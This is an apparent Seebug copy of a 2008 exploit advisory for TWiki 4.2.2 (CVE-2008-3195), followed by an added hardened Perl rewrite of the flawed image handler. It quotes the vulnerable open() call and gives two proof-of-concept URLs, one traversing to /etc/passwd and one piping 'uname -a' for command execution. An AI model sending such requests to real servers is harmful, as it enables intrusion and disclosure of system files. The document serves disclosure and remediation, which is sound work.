seebug | Root | SSV:65731
History: Jul 01, 2014 - 12:00 a.m.

TWiki <= 4.2.2 (action) Remote Code Execution Vulnerability

EPSS: 0.124 (Low), Percentile: 95.5%

No description provided by source.


#-----------webDEViL - [ w3bd3vil [at] gmail [dot] com ] -----------#
#-----------TWiki Remote Code Execution <= 4.2.2--------------------#

# ----------developers site: http://www.twiki.org-------------------#
# ----------CVE Id(s)      : CVE-2008-3195--------------------------#

# http://twiki.org/cgi-bin/view/Codev/DownloadTWiki#4_2_3_Bugfix_Highlights

The "configure" file in TWiki's bin folder is vulnerable to code execution and local file inclusion.

According to TWiki's documentation this file is meant to be protected with .htaccess, but many times you find it is not ;)

Vulnerable code:

if( $action eq 'image' ) {
    # SMELL: this call is correct, but causes a perl error
    # on some versions of CGI.pm
    # print $query->header(-type => $query->param('type'));
    # So use this instead:
    print 'Content-type: '.$query->param('type')."\n\n";

    # Two-argument open() on a request parameter: the 'image' value
    # controls both the path and the open mode (including pipes).
    if( open(F, 'logos/'.$query->param('image' ))) {
        local $/ = undef;
        print <F>;
        close(F);
    }
}

http://localhost/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain

http://localhost/twiki/bin/configure?action=image;image=|uname -a|;type=text/plain

# milw0rm.com [2008-09-21]
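
A hardened form of the image action shown above, as an added example: it is not code from the advisory and not TWiki's actual 4.2.3 fix. The helper names resolve_logo and serve_image and the extension allowlist are assumptions; CGI.pm is assumed to be installed, as it is for TWiki's configure script.

```perl
#!/usr/bin/perl
# Added example: hardened sketch of the 'image' action (not TWiki's own patch).
use strict;
use warnings;
use CGI;

# Assumption: logos/ only ever holds files with these extensions.
my %TYPE_FOR = (gif => 'image/gif', png => 'image/png',
                jpg => 'image/jpeg', ico => 'image/x-icon');

# Hypothetical helper: returns (path, content_type) or an empty list.
sub resolve_logo {
    my ($name) = @_;
    return unless defined $name;
    # Bare file name only: no '/', '\', '|', whitespace, NUL or leading dot,
    # so neither directory traversal nor open()'s pipe syntax can pass.
    return unless $name =~ /\A([A-Za-z0-9][A-Za-z0-9_-]{0,63})\.([a-z]{3})\z/;
    my ($base, $ext) = ($1, $2);
    my $type = $TYPE_FOR{$ext} or return;
    return ("logos/$base.$ext", $type);
}

# Hypothetical helper: serves one logo, returns 1 on success and 0 otherwise.
sub serve_image {
    my ($query) = @_;
    my ($path, $type) = resolve_logo(scalar $query->param('image'));
    unless (defined $path) {
        print "Status: 400 Bad Request\nContent-type: text/plain\n\n";
        print "invalid image name\n";
        return 0;
    }
    # Three-argument open with an explicit '<' mode: the name is always
    # treated as a file to read, never as a mode prefix or a command.
    open(my $fh, '<', $path) or do {
        print "Status: 404 Not Found\nContent-type: text/plain\n\n";
        return 0;
    };
    binmode $fh;
    binmode STDOUT;
    # The content type comes from the allowlist, not the 'type' parameter.
    print "Content-type: $type\n\n";
    local $/ = undef;
    print <$fh>;
    close $fh;
    return 1;
}

my $query = CGI->new;
serve_image($query) if ($query->param('action') // '') eq 'image';
```

Input validation here complements, and does not replace, restricting access to bin/configure with .htaccess as TWiki's documentation describes.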